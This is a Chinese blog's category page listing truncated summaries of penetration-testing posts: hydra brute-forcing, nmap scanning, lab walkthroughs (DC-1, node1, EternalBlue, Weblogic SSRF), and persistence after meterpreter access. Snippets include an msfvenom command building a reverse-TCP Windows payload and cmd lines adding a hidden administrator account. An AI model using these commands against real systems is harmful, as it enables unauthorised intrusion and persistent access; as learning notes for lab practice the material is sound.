web
文章平均质量分 97
Leng_tian
这个作者很懒,什么都没留下…
展开
-
hydra(九头蛇爆破工具)
hydra用法:hydra<参数><ip地址><服务名>hydra支持的服务有:telnet ftp ssh mysql mssql vnc pcanywhere RDP(3389)等.hydra的一些参数:-R 继续从上一次的进度开始爆破-s <port> 指定端口-l <username> 指定登录的用户名-L <username-list> 指定用户名字典-p <password> 指定密码-t &l原创 2020-09-21 20:40:38 · 4047 阅读 · 0 评论 -
ubuntu 搭建web服务(mysql + php + apache)
之前想在阿里云的服务器上大家搭建一下的但是当时没啥时间就没整,现在就整一下ubuntu的吧;首先第一步就是你肯定需要一个ubuntu吧,然后开始安装mysql服务:只需要几条命令就可以了:apt-get install mysql-serverapt-get install mysql-clientapt-get install libmysqlclient-dev在安装的时候会遇到问题:无法获得锁 /var/lib/dpkg/lock-frontend - open (11: 资源暂时原创 2020-09-21 20:39:12 · 418 阅读 · 0 评论 -
获取meterpreter权限后如何留后门
我们知道当我们拿到主机meterpreter权限是可以留后门进行持久化攻击,常见的cmd命令创建文本,并向里出入内容,并打开:echo "hello I am hacker" >>1.txt之后再打开:notepad 1.txt即可拿永恒之蓝来说得到meterpreter后想要利用3389进行远程登录就得需要用户账号密码,一下有两种方法创建账号方法一:利用msf的post后渗透攻击模块直接在 直接在meterpreter下创建,这种创建的账号直接就是administrat原创 2020-09-21 20:38:08 · 2092 阅读 · 0 评论 -
信息收集中nmap的常用命令
第一步用nmap就是判断存活主机:nmap -sT 192.168.1.1/24为了省时间可以不以-sT来扫描直接这样:nmap 192.168.1.1/24猜测主机IP,猜到后就可以进行进一步的信息收集,开启的端口:nmap -A 192.168.1.144扫描指定端口这里以80端口来为例:nmap -sT -p 80 192.168.1.1/24只显示80端口开放的主机:nmap -sS -p 80 -oG - 192.168.1.14...原创 2020-09-21 20:34:14 · 527 阅读 · 0 评论 -
msf常用命令
msfvenom:生成payload工具常用参数:-l查看列表-p 指定payload-f指定输出格式-e指定一个编码方式-i 指定编码次数例如生成一个反向tcp的payload:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.130 LPORT=4444 -e x86/shikata_ga_nai -I 5 -f exe > 1.exe上面是生成Windows可执行文件,也可以生成Li...原创 2020-07-14 21:29:10 · 1956 阅读 · 1 评论 -
如何系统学习web安全路线
网络安全的系统学习luxi路线如何正确使用 Tor -> 初步了解各类常规内网穿透手段 -> 深度理解端口转发的底层实现细节 -> 熟知要用到各类端口转发及隧道的典型渗透场景 -> 关于...原创 2020-06-03 18:17:29 · 647 阅读 · 0 评论 -
网络安全学习路线
作者:拼客学院陈鑫杰链接:https://www.zhihu.com/question/67598183/answer/1056878862来源:知乎著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。关于黑客或网络安全如何入门和学习路径,我在去年的问答和专栏中也陆陆续续解读过,近期知乎时间线上又多了很多高度类似的问题邀请,本次我再次做了一次系统化的梳理,希望能更好地帮到新人。(后续这个答案我会持续更新)在这里,我将这个整份答案分为 黑客(网络安全)入门必备、黑客(网络安全.原创 2020-06-05 19:25:23 · 20943 阅读 · 11 评论 -
高效的使用搜索引擎
我们在遇到问题时总是会第一时间想到的就是上网搜索,但是往往有搜不到自己想要的文章,往往我们使用的百度搜索偏多,在各种搜索引擎中,往往会把访问最多的文章放到最前面,这就是问题所在了,往往访问量最多的是比较‘古老的’文章,而这些文章已经过时不能解决当下的问题,这时我们就应该使用百度的搜索技巧:我今天才发现百度搜索引擎居然还有高级搜索设置以前竟然没太注意,进入高级搜索可以设置文章发布的时间限制,这就比...原创 2020-03-21 11:38:15 · 3701 阅读 · 2 评论 -
如何删除不死马?
当自己的服务器被别人上传了不死马,如何应对呢?第一个方法就是,重启自己的服务,这样不死马就没有了,就不会再生成了,毕竟不死马是在内存当中的。第二种方法就是用命令将在内存中的进程删除;kill -9 -1这个命令可以杀掉当前用户下面的所有进程,当然就可以把不死马杀掉。可以使用 ps aux 命令 列出所有进程,找到要杀掉的进程运用命令:kill pid 就可以了可以使用...原创 2019-11-25 15:50:20 · 4951 阅读 · 0 评论 -
linux下SUID提权以及文件权限问题
要讲到suid提权的话,首先应该就要非常清楚地知道linux中文件权限的相关问题。在linux系统上有着非常严格的权限控制,如果想对某个文件执行某种操作的话,必须具有对应的权限方可执行成功。linux下的文件的权限类型一般包括读、写、执行。对应的字母为r、w、x。linux下权限有三种分组分别为拥有者、群组、其他组。每个文件都可以针对这三个组,设置不同的rwx(读写执行)权限。在Linux...原创 2019-11-25 15:47:48 · 1733 阅读 · 0 评论 -
DC:1靶机
这个靶机有五个flag,适合初学者,我没管那么多,反正直接拿到root权限就可以了。下载地址自己去Google吧。环境搭建好之后,第一步还是老样子,主机发现:netdiscover -r 192.168.233.0/24得到主机的ip为192.168.233.144进一步用nmap扫一遍,在扫的同时可以访问他的ip去看看。nmap -sS -A 192.168.233.0/24看到...原创 2019-11-25 15:46:17 · 403 阅读 · 0 评论 -
lcx内网穿神器linux下portmap的使用
本次笔记主要是讲解如何将一个处于内网主机的linux系统的22端口转发到公网的7777端口上,然后就可以利用ssh连接公网的7777端口来进行访问内网主机。本次环境1.一台linux系统的内网主机192.168.233.140(这里我用的是kali)2.公网ip(这里是我在阿里云买的服务器:47.93.xxx.xxx)3.随意一台linux系统的内网主机(这里我用的是ubuntu):就是用...原创 2019-11-04 20:00:08 · 8541 阅读 · 0 评论 -
node1靶机渗透学习
node靶机渗透详解下载靶机:这里有一个不错的网址里面都是靶机,适合练手https://www.vulnhub.com/本次靶机下载为node靶机: https://www.vulnhub.com/entry/node-1,252/靶机环境:处于nat网络下的VM虚拟机渗透实战:攻击机:kali :IP为192.168.233.131靶机node:未知(可由后期扫描知道)...原创 2019-08-09 15:26:36 · 751 阅读 · 0 评论 -
cmd命令添加用户为管理员
cmd创建管理员用户:新建管理员账号:netuser 这是查看用户添加用户netuser name password /add例如:netuser tian 123456 /add这就添加了一个用户为:tian密码为:123456的用户了第二步将此用户提升为管理员:net localgroup administrators tian...原创 2019-08-09 20:30:25 · 39673 阅读 · 0 评论 -
攻防世界unserialize3题解
unserialize3看题目就知道这是一道反序列化问题,之前也遇到过,也深入理解过,但时间隔了这么久,难免会有些忘记,通过这道题来再次深入序列化与反序列化的问题。0x00:那么到底什么是序列化,反序列化呢?先来讲一点为什么要用序列化呢?他到底好在哪里呢?php序列化是为了什么呢?当然有一点都知道就是为了传输数据更加方便(这种压缩格式化储存当然在数据传输方面更加简单方便),我们把一...原创 2019-08-14 17:52:55 · 6090 阅读 · 5 评论 -
Weblogic-SSRF漏洞复现
这两天了解的ssrf复现这个漏洞差不多了,开始进行笔迹整理:上面一篇介绍的就是些入门的基础,让你可以更加好的去理解,更好的懂ssrf这个漏洞的原理。0x00 到底什么是ssrf呢?SSRF(server-side request forgery ):服务器端请求伪造。是一种由攻击者构造形成由服务器端发起请求的一个安全漏洞,一般情况下,ssrf攻击的目标是从外网无法访问的内部系统(正是因...原创 2019-08-14 18:00:48 · 4375 阅读 · 0 评论 -
永恒之蓝ms17_010复现笔记详解
简单的讲解一下永恒之蓝的复现过程.在这个漏洞中利用的是445端口来进行攻击渗透的。本次实验的环境:攻击机为kali: 192.168.233.131目标主机为windows 7旗舰版:处于nat网络下的虚拟机 192.168.233.144为了更方便的实现复现,关闭目标主机的防火墙,之后开启目标主机就没他什么事了第一步老样子,探测同一局域网的存活主机:nmap -sP 1...原创 2019-08-12 17:51:28 · 724 阅读 · 0 评论 -
什么是IP地址、子网掩码、DNS服务器、网关、默认网关、广播地址详细解析
为了深入的学习web网路安全的知识,最近看了不少有关资料,以供大家参考: 什么是IP地址,子网掩码,默认网关,DNS服务器呢? 相信大家在接触计算机知识的时候经常会与这些名词打交道,但是又不懂其中的原理,甚至都不知道是什么东西,这严重阻碍了我们的道路,下面就围绕着这个来讲一讲:我们知道,没有了IP地址就不能上网,我们也知道没有设DNS就不能上外网,可他们又有什么区别呢?不知道大家有没...原创 2019-08-12 21:52:10 · 4262 阅读 · 2 评论 -
nmap渗透之信息收集基本命令
第一步用nmap就是判断存活主机:nmap -sT 192.168.1.1/24为了省时间可以不以-sT来扫描直接这样:nmap 192.168.1.1/24猜测主机IP,猜到后就可以进行进一步的信息收集,开启的端口:nmap -A 192.168.1.144扫描指定端口这里以80端口来为例:nmap -sT -p 80 192.168.1.1...原创 2019-09-12 20:17:18 · 461 阅读 · 0 评论